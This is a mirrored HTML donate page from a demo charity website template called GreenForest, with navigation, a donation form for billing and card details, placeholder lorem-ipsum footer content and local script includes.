<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from demos.codexcoder.com/labartisan/html/GreenForest/donate.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Feb 2019 23:28:30 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Donate</title>
    <link rel="shortcut icon" type="image/x-icon" href="assets/images/favicon.ico" />
    <!-- Plugin css -->
    <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/fonts/flaticon.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/animate.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/swiper.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/lightcase.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/jquery.nstSlider.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/flexslider.css" media="all" />

    <!-- own style css -->
    <link rel="stylesheet" type="text/css" href="assets/css/style.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/rtl.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/responsive.css" media="all" />

</head>

<body>
    <div class="box-layout">
        <div class="box-style">
            <div class="color-btn">
                <a href="#"><i class="fa fa-cog fa-spin" aria-hidden="true"></i></a>
            </div>
            <div class="box-style-inner">
                <h3>Box Layout</h3>
                <div class="box-element">
                    <div class="box-heading">
                        <h5>HTML Layout</h5>
                    </div>
                    <div class="box-content">
                        <ul class="box-customize">
                            <li><a class="boxed-btn" href="#">Boxed</a></li>
                            <li><a class="wide-btn" href="#">Wide</a></li>
                            <li><a class="rtl-btn" href="#">Rtl</a></li>
                            <li><a class="ltl-btn" href="#">Ltl</a></li>
                        </ul>
                    </div>
                </div>
                <div class="box-element">
                    <div class="box-heading">
                        <h5>Backgroud Images</h5>
                    </div>
                    <div class="box-content">
                        <ul class="box-bg-img">
                            <li>
                                <a class="bg-1" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-2" href="#"><img src="assets/images/box-style/02.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-3" href="#"><img src="assets/images/box-style/03.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-4" href="#"><img src="assets/images/box-style/04.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-5" href="#"><img src="assets/images/box-style/05.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-6" href="#"><img src="assets/images/box-style/06.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-7" href="#"><img src="assets/images/box-style/07.jpg" alt=""></a>
                            </li>
                            <li>
                                <a class="bg-8" href="#"><img src="assets/images/box-style/08.jpg" alt=""></a>
                            </li>
                        </ul>
                    </div>
                </div>
                <div class="box-element">
                    <div class="box-heading">
                        <h5>Backgroud Pattern</h5>
                    </div>
                    <div class="box-content">
                        <ul class="box-pattern-img">
                        <li>
                            <a class="pt-1" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/01.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-2" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/02.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-3" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/03.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-4" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/04.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-5" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/05.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-6" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/06.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-7" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/07.png"" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-8" href="#"><img src="../../../../www.codexcoder.com/images/auror/pt-image/08.png"" alt=""></a>
                        </li>
                    </ul>
                    </div>
                </div>
            </div>
        </div>
        <header class="header-style-2">
            <div class="bg-header-top">
                <div class="container">
                    <div class="row">
                        <div class="header-top">
                            <ul class="h-contact">
                                <li><i class="flaticon-time-left"></i> Time : Tusday-Monday : 9:00am-6:00pm</li>
                                <li><i class="flaticon-vibrating-phone"></i> Phone : +88017 923 970 659</li>
                                <li><i class="flaticon-placeholder"></i> Address : Sute 07 Sahara Center</li>
                            </ul>
                            <div class="donate-option">
                                <a href="donate.html"><i class="fa fa-heart" aria-hidden="true"></i> donate now</a>
                            </div>
                            <!-- .donate-option -->
                        </div>
                        <!-- .header-top -->
                    </div>
                    <!-- .header-top -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-header-top -->

            <!-- Start Menu -->
            <div class="bg-main-menu menu-scroll">
                <div class="container">
                    <div class="row">
                        <div class="main-menu">
                            <a class="show-res-logo" href="index.html"><img src="assets/images/home01/logo.png" alt="logo" class="img-responsive" /></a>
                            <nav class="navbar">
                                <!-- Brand and toggle get grouped for better mobile display -->
                                <div class="navbar-header">
                                    <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
								<span class="sr-only">Toggle navigation</span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
							  </button>
                                    <a class="navbar-brand" href="index.html"><img src="assets/images/home01/logo.png" alt="logo" class="img-responsive" /></a>
                                </div>
                                <!-- Collect the nav links, forms, and other content for toggling -->
                                <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                                    <ul class="nav navbar-nav">
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">HOME <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="index.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page one</a></li>
                                                <li><a href="home02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page two</a></li>
                                                <li><a href="home03.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page three</a></li>
                                                <li><a href="home_box.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Box style</a></li>
                                                <li><a href="home_onepage.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home One Page</a></li>
                                                <li><a href="index-rtl.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> الصفحة الرئيسية رتل</a></li>
                                            </ul>
                                        </li>
                                        <li><a href="about.html">About</a></li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Services <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="services.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Services</a></li>
                                                <li><a href="service_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Service</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle active" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">pages<span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Our Team<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="team.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Team</a></li>
                                                        <li><a href="team_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Team</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Our project<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="project.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Projects</a></li>
                                                        <li><a href="project_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Project</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="shop.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop</a></li>
                                                        <li><a href="shop_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Shop</a></li>
                                                        <li><a href="shop_cart.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop Cart</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Campaign<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="campaign.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Campaign</a></li>
                                                        <li><a href="campaign_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Campaign</a></li>
                                                    </ul>
                                                </li>
                                                <li class="sub-active"><a href="donate.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Donate Page</a></li>
                                                <li><a href="404_page.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> 404 Page</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Events <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="event.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Events</a></li>
                                                <li><a href="event_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Event</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Blog <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="blog.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Blog</a></li>
                                                <li><a href="blog_02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Blog style 02</a></li>
                                                <li><a href="blog_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Blog</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Gallery <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="gallery.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery</a></li>
                                                <li><a href="gallery_02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery 02</a></li>
                                                <li><a href="gallery_03.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery 03</a></li>
                                            </ul>
                                        </li>
                                        <li><a href="contact.html">contacts</a></li>
                                    </ul>
                                    <div class="menu-right-option pull-right">
                                        <div class="cart-option">
                                            <div class="cart-icon">
                                                <i class="fa fa-shopping-cart" aria-hidden="true"></i>
                                                <div class="count-cart">2</div>
                                            </div>
                                            <!-- .cart-icon -->
                                            <div class="cart-dropdown-menu">
                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="single_shop_cat.html"><img src="assets/images/home01/cart-img-1.jpg" alt="cart-img-1"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->

                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="#"><img src="assets/images/home01/cart-img-2.jpg" alt="cart-img-2"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->
                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="#"><img src="assets/images/home01/cart-img-3.jpg" alt="cart-img-3"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->
                                                <div class="total-price">
                                                    <p><span>Total Price :</span> $700 </p>
                                                </div>
                                                <!-- .total-prices -->
                                                <div class="checkout-btn">
                                                    <a href="#" class="btn btn-default">donate now</a>
                                                </div>
                                            </div>
                                            <!-- .cart-dropdown-menu -->
                                        </div>
                                        <!-- .cart-option -->

                                        <div class="search-box">
                                            <i class="fa fa-search first_click" aria-hidden="true" style="display: block;"></i>
                                            <i class="fa fa-times second_click" aria-hidden="true" style="display: none;"></i>
                                        </div>
                                        <div class="search-box-text">
                                            <form action="http://demos.codexcoder.com/labartisan/html/GreenForest/search">
                                                <input type="text" name="search" id="all-search" placeholder="Search Here">
                                            </form>
                                        </div>
                                    </div>
                                    <!-- .header-search-box -->
                                </div>
                                <!-- .navbar-collapse -->
                            </nav>
                        </div>
                        <!-- .main-menu -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-main-menu -->
        </header>

        <!-- Start Page Header Section -->

        <section class="bg-page-header">
            <div class="page-header-overlay">
                <div class="container">
                    <div class="row">
                        <div class="page-header">
                            <div class="page-title">
                                <h2>Donate Page</h2>
                            </div>
                            <!-- .page-title -->
                            <div class="page-header-content">
                                <ol class="breadcrumb">
                                    <li><a href="index.html">Home</a></li>
                                    <li>Donate</li>
                                </ol>
                            </div>
                            <!-- .page-header-content -->
                        </div>
                        <!-- .page-header -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .page-header-overlay -->
        </section>


        <!-- End Page Header Section -->


        <!-- Start our Donate  Section -->

        <section class="bg-donate-section">
            <div class="container">
                <div class="row">
                    <div class="donate-form">
                        <form action="#" method="POST" class="contact-form">
                            <div class="select-amount">
                                <div class="row">
                                    <div class="col-md-7">
                                        <div class="form-group">
                                            <h3>How Much Would you like to Donate?</h3>
                                            <div class="radio-select">
                                                <input type="radio" name="sel-amount" id="amount-1">
                                                <label for="amount-1">$100</label>
                                            </div>
                                            <!-- .radio-select -->
                                            <div class="radio-select">
                                                <input type="radio" name="sel-amount" id="amount-2">
                                                <label for="amount-2">$150</label>
                                            </div>
                                            <!-- .radio-select -->
                                            <div class="radio-select">
                                                <input type="radio" name="sel-amount" id="amount-3">
                                                <label for="amount-3">$250</label>
                                            </div>
                                            <!-- .radio-select -->
                                            <div class="radio-select">
                                                <input type="radio" name="sel-amount" id="amount-4">
                                                <label for="amount-4">$350</label>
                                            </div>
                                            <!-- .radio-select -->
                                            <div class="radio-select">
                                                <input type="radio" name="sel-amount" id="amount-5">
                                                <label for="amount-5">$500</label>
                                            </div>
                                            <!-- .radio-select -->
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-7 -->
                                    <div class="col-md-5">
                                        <div class="form-group other-amount contact-form">
                                            <input type="text" class="form-control" name="other-amount" value="" placeholder="Or Other Amount">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-5 -->
                                </div>
                                <!-- .row -->
                            </div>
                            <!-- .select-amount -->
                            <div class="information-form">
                                <h3>BILLING INFORMATION</h3>
                                <div class="row">
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="firstName">First Name<span>*</span></label>
                                            <input type="text" class="form-control" name="firstName" id="firstname" placeholder="First Name">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="lastName">Last Name<span>*</span></label>
                                            <input type="text" class="form-control" name="lastName" id="firstname" placeholder="Last Name">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="email">Email<span>*</span></label>
                                            <input type="text" class="form-control" name="email" id="email" placeholder="Email">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="email">Phone<span>*</span></label>
                                            <input type="text" class="form-control" name="phone" id="phone" placeholder="Phone">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="address">Address 1<span>*</span></label>
                                            <input type="text" class="form-control" name="address" id="address" placeholder="Address 1">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="addressTwo">Address 2<span>*</span></label>
                                            <input type="text" class="form-control" name="addressTwo" id="addresstwo" placeholder="Address 2">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                </div>
                                <!-- .row -->
                            </div>
                            <!-- .information-form -->
                            <div class="paymeny-information">
                                <h3>PAYMENT INFORMATION</h3>
                                <ul class="paymeny-card">
                                    <li><img src="assets/images/donate/payment-logo-1.jpg" alt="payment-logo-1" /></li>
                                    <li><img src="assets/images/donate/payment-logo-2.jpg" alt="payment-logo-1" /></li>
                                    <li><img src="assets/images/donate/payment-logo-3.jpg" alt="payment-logo-1" /></li>
                                    <li><img src="assets/images/donate/payment-logo-4.jpg" alt="payment-logo-1" /></li>
                                </ul>
                                <!-- .paymeny-card -->
                                <div class="row">
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="cardNumber">Card Number<span>*</span></label>
                                            <input type="text" class="form-control" name="cardNumber" id="cardnumber" placeholder="Card Number">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="cardName">Card Holder Name<span>*</span></label>
                                            <input type="text" class="form-control" name="cardName" id="cardname" placeholder="Card Holder Name">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="cardName">Expire Date<span>*</span></label>
                                            <div class="select-option">
                                                <div class="select-box">
                                                    <select>
														<option value="">01</option>
														<option value="">02</option>
														<option value="">03</option>
														<option value="">04</option>
														<option value="">05</option>
														<option value="">06</option>
														<option value="">07</option>
														<option value="">08</option>
														<option value="">09</option>
														<option value="">10</option>
														<option value="">11</option>
														<option value="">12</option>
														
													</select>
                                                    <span class="select-icon"><i class="fa fa-angle-down" aria-hidden="true"></i></span>
                                                </div>
                                                <!-- .select-box -->
                                                <div class="select-box">
                                                    <select>
														<option value="">2013</option>
														<option value="">2014</option>
														<option value="">2015</option>
														<option value="">2016</option>
														<option value="">2017</option>
														<option value="">2018</option>
														<option value="">2019</option>
														<option value="">2020</option>
														
													</select>
                                                    <span class="select-icon"><i class="fa fa-angle-down" aria-hidden="true"></i></span>
                                                </div>
                                                <!-- .select-box -->
                                            </div>
                                            <!-- .select-option -->
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                    <div class="col-md-6">
                                        <div class="form-group">
                                            <label for="security">Security Code (CVC)<span>*</span></label>
                                            <input type="text" class="form-control" name="security" id="security" placeholder="Security Code">
                                        </div>
                                        <!-- .form-group -->
                                    </div>
                                    <!-- .col-md-6 -->
                                </div>
                                <!-- .row -->
                            </div>
                            <!-- .paymeny-information -->
                            <button type="submit" class="btn btn-default">Donate Now</button>
                        </form>
                    </div>
                    <!-- .donate-form -->
                </div>
                <!-- .row -->
            </div>
            <!-- .container -->
        </section>


        <!-- End our Donate section -->


        <!-- Start Footer Section -->

        <footer>
            <div class="bg-footer-top">
                <div class="container">
                    <div class="row">
                        <div class="footer-top">
                            <div class="row">
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>About us</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <div class="widgets-content">
                                            <p>Distily enable team driven services through extensive is a relatonships platforms with interactive content. Enthusiastically scale effective.</p>
                                        </div>
                                        <!-- .widgets-content -->
                                        <div class="address-box">
                                            <ul class="address">
                                                <li>
                                                    <i class="fa fa-home" aria-hidden="true"></i>
                                                    <span>New Chokoya Road, USA.</span>
                                                </li>
                                                <li>
                                                    <i class="fa fa-phone" aria-hidden="true"></i>
                                                    <span>+8801 923 970 698.</span>
                                                </li>
                                                <li>
                                                    <i class="fa fa-envelope-o" aria-hidden="true"></i>
                                                    <span>Contact@admin.com</span>

                                                </li>
                                                <li>
                                                    <i class="fa fa-globe" aria-hidden="true"></i>
                                                    <span>Emai@admin.com</span>
                                                </li>
                                            </ul>
                                        </div>
                                        <!-- .address -->
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Latest News</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <ul class="latest-news">
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-1.jpg" alt="small-bog-img-1" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="#">Corem psum dolr them amectetuer adipiscing...</a></h5>
                                                    <span class="post-date">04 February 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-2.jpg" alt="small-bog-img-2" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="#">Mirum est notare quam littera gothica nunc...</a></h5>
                                                    <span class="post-date">28 January 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-3.jpg" alt="small-bog-img-3" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="#">Corem psum dolr them amectetuer adipiscing...</a></h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                        </ul>
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Twitter Widget</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <ul class="twitter-widget">
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5>Raritas etiam processus a theme dynamicus sequitur <a href="#">http://admin@gmail.com</a></h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5>Duis autem vel eum <a href="#">#iriure</a>dolor in hendrerit in vulputate </h5>
                                                    <span class="post-date">8 months ago</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                            <li>
                                                <div class="twitter-icon"><i class="fa fa-twitter" aria-hidden="true"></i></div>
                                                <div class="twitter-content">
                                                    <h5><a href="#">@frankdoe</a> am liber tempor cum soluta nobis eleifend</h5>
                                                    <span class="post-date">03 January 2017</span>
                                                </div>
                                                <!-- .twitter-content -->
                                            </li>
                                        </ul>
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Recent Photos</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <div class="footer-instagram">
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-1.jpg" alt="footer-instagram-img-1" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-2.jpg" alt="footer-instagram-img-2" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-3.jpg" alt="footer-instagram-img-3" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-4.jpg" alt="footer-instagram-img-4" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-5.jpg" alt="footer-instagram-img-5" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-6.jpg" alt="footer-instagram-img-6" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-7.jpg" alt="footer-instagram-img-7" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-8.jpg" alt="footer-instagram-img-8" /></a>
                                            <a href="#"><img src="assets/images/home01/footer-instagram-img-9.jpg" alt="footer-instagram-img-9" /></a>
                                        </div>
                                        <!-- .footer-instagram -->
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                            </div>
                            <!-- .row -->
                        </div>
                        <!-- .footer-top -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-footer-top -->

            <div class="bg-footer-bottom">
                <div class="container">
                    <div class="row">
                        <div class="footer-bottom">
                            <div class="copyright-txt">
                                <p>&copy; 2017. Designer By <a href="#" title="Al-Amin(Web Designer)">LabArtisan</a></p>
                            </div>
                            <!-- .copyright-txt -->
                            <div class="social-box">
                                <ul class="social-icon-rounded">
                                    <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-google" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                    <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                </ul>
                            </div>
                            <!-- .social-box -->

                        </div>
                        <!-- .footer-bottom -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-footer-bottom -->

        </footer>

        <!-- End Footer Section -->

        <!-- Start Scrolling -->

        <div class="scroll-img"><i class="fa fa-angle-up" aria-hidden="true"></i></div>


        <!-- End Scrolling -->

    </div>

    <!-- Start Pre-Loader-->

    <div id="loading">
        <div id="loading-center">
            <div id="loading-center-absolute">
                <div class="object" id="object_one"></div>
                <div class="object" id="object_two"></div>
                <div class="object" id="object_three"></div>
                <div class="object" id="object_four"></div>
            </div>
        </div>
    </div>


    <!-- End Pre-Loader -->



    <script type="text/javascript" src="assets/js/jquery-2.2.3.min.js"></script>
    <script type="text/javascript" src="assets/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.easing.1.3.js"></script>
    <script type="text/javascript" src="assets/js/jquery.waypoints.min.js"></script>
    <script type="text/javascript" src="assets/js/jquery.counterup.min.js"></script>
    <script type="text/javascript" src="assets/js/swiper.min.js"></script>
    <script type="text/javascript" src="assets/js/plugins.isotope.js"></script>
    <script type="text/javascript" src="assets/js/isotope.pkgd.min.js"></script>
    <script type="text/javascript" src="assets/js/lightcase.js"></script>
    <script type="text/javascript" src="assets/js/jquery.nstSlider.js"></script>
    <script type="text/javascript" src="assets/js/jquery.flexslider.js"></script>
    <script type="text/javascript" src="assets/js/custom.isotope.js"></script>
    <script type="text/javascript" src="assets/js/custom.map.js"></script>

    <script type="text/javascript" src="assets/js/custom.js"></script>


